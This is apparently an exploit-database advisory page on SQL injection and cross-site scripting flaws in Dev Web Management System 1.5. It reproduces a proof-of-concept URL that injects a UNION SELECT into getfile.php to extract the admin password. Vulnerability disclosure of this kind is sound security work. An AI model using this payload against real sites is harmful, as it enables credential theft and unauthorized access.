header-logo
Suggest Exploit
vendor:
Dev Web Management System
by:
Unknown
N/A
CVSS
N/A
SQL injection and cross-site scripting
Unknown
CWE
Product Name: Dev Web Management System
Affected Version From: 1.5
Affected Version To: 1.5
Patch Exists: Unknown
Related CWE: Unknown
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested: Unknown
Unknown

Multiple input validation vulnerabilities in Dev Web Management System

Dev Web Management System versions 1.5 and earlier are prone to multiple input validation vulnerabilities. These issues may allow SQL injection and cross-site scripting attacks.

Mitigation:

Unknown
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/16063/info
 
Dev Web Management System is prone to multiple input validation vulnerabilities. These issues may allow SQL injection and cross-site scripting attacks.
 
Dev Web Management System versions 1.5 and earlier are prone to these issues. 

http://example.com/[path]/getfile.php?cat=%%'UNION%20SELECT%20value,value%20FROM%20variables1%20%20WHERE%20name='admin_password'/*

Navigation

Suggest Exploit

Services By CQR